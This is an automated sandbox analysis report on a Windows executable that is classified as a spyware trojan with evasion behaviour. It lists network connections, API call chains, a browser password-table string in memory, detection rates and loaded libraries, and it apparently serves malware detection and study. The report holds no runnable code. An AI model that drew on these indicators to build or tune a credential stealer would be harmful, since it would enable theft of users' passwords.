            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
            Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
            Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
            Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.3:49957 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.3:49963 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49981 version: TLS 1.2
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00406AF20_2_00406AF2
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_73F91B5F0_2_73F91B5F
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_00404DCC3_2_00404DCC
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_00406AF23_2_00406AF2
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_001662703_2_00166270
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_001655503_2_00165550
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_001655403_2_00165540
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_00162DD13_2_00162DD1
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_0016DEC03_2_0016DEC0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36AE36C83_2_36AE36C8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36AE30B03_2_36AE30B0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36AED8C83_2_36AED8C8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36AE00403_2_36AE0040
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36AE90993_2_36AE9099
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36AED8B73_2_36AED8B7
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B99AA83_2_36B99AA8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B907883_2_36B90788
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B94CA83_2_36B94CA8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9E1203_2_36B9E120
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9A1003_2_36B9A100
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B99A983_2_36B99A98
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B94A883_2_36B94A88
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9F2803_2_36B9F280
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9AEF83_2_36B9AEF8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B942F13_2_36B942F1
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9AEE93_2_36B9AEE9
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9F6D83_2_36B9F6D8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B93ED13_2_36B93ED1
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9F6C83_2_36B9F6C8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9EE283_2_36B9EE28
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9EE183_2_36B9EE18
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9F2703_2_36B9F270
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B996503_2_36B99650
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B996403_2_36B99640
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9B7A83_2_36B9B7A8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9B7993_2_36B9B799
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9D7813_2_36B9D781
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9BBF03_2_36B9BBF0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9FB303_2_36B9FB30
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9FB203_2_36B9FB20
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B943003_2_36B94300
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9077B3_2_36B9077B
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9B3503_2_36B9B350
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9B3413_2_36B9B341
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9DCB83_2_36B9DCB8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9C4B03_2_36B9C4B0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9C4A33_2_36B9C4A3
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9A0813_2_36B9A081
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B984F03_2_36B984F0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B984DF3_2_36B984DF
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9DCC83_2_36B9DCC8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9BC003_2_36B9BC00
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9D8703_2_36B9D870
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9C0583_2_36B9C058
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9C0533_2_36B9C053
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B98DA03_2_36B98DA0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B98D903_2_36B98D90
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B991F83_2_36B991F8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B991E83_2_36B991E8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9E9D03_2_36B9E9D0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B989383_2_36B98938
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9E11B3_2_36B9E11B
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9C9083_2_36B9C908
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9E5783_2_36B9E578
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B9E5683_2_36B9E568
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_36B989483_2_36B98948
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F87703_2_371F8770
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F4FD03_2_371F4FD0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F66903_2_371F6690
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F84083_2_371F8408
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F6CE03_2_371F6CE0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F73303_2_371F7330
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F60483_2_371F6048
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371FB8AC3_2_371FB8AC
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F17303_2_371F1730
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F17203_2_371F1720
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F1FD03_2_371F1FD0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F4FC03_2_371F4FC0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371FB7E83_2_371FB7E8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F1FE03_2_371F1FE0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F3E383_2_371F3E38
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F3E483_2_371F3E48
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F66803_2_371F6680
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F0D393_2_371F0D39
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F0D483_2_371F0D48
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F35983_2_371F3598
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F35893_2_371F3589
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F24383_2_371F2438
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F24283_2_371F2428
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F04983_2_371F0498
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F04883_2_371F0488
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F2CD83_2_371F2CD8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F6CD23_2_371F6CD2
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F44CF3_2_371F44CF
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F2CE83_2_371F2CE8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F73203_2_371F7320
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F1B783_2_371F1B78
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F1B883_2_371F1B88
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371FBAB83_2_371FBAB8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371FBAA83_2_371FBAA8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F31303_2_371F3130
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F31403_2_371F3140
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F79783_2_371F7978
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F79683_2_371F7968
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F11903_2_371F1190
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F11A03_2_371F11A0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F39F03_2_371F39F0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F39E13_2_371F39E1
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F60383_2_371F6038
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F00403_2_371F0040
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371FD8703_2_371FD870
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F28903_2_371F2890
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F28813_2_371F2881
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371FB8A03_2_371FB8A0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F08F03_2_371F08F0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_371F08E03_2_371F08E0
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_3775C0683_2_3775C068
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_3775AEA83_2_3775AEA8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_37754DC83_2_37754DC8
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: String function: 00402C41 appears 51 times
            Source: 6ZoBPR3isG.exe, 00000000.00000000.1353099128.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6ZoBPR3isG.exe
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2616557966.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6ZoBPR3isG.exe
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643001958.0000000033F67000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 6ZoBPR3isG.exe
            Source: 6ZoBPR3isG.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs 6ZoBPR3isG.exe
            Source: 6ZoBPR3isG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 3_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034A5
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00404850 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404850
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeMutant created: NULL
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeFile created: C:\Users\user\AppData\Local\Temp\nsd98ED.tmpJump to behavior
            Source: 6ZoBPR3isG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2645459156.000000003515D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 6ZoBPR3isG.exeVirustotal: Detection: 41%
            Source: 6ZoBPR3isG.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeFile read: C:\Users\user\Desktop\6ZoBPR3isG.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\6ZoBPR3isG.exe "C:\Users\user\Desktop\6ZoBPR3isG.exe"
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess created: C:\Users\user\Desktop\6ZoBPR3isG.exe "C:\Users\user\Desktop\6ZoBPR3isG.exe"
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeProcess created: C:\Users\user\Desktop\6ZoBPR3isG.exe "C:\Users\user\Desktop\6ZoBPR3isG.exe"Jump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\6ZoBPR3isG.exeSection loaded: srvcli.dllJump to behavior
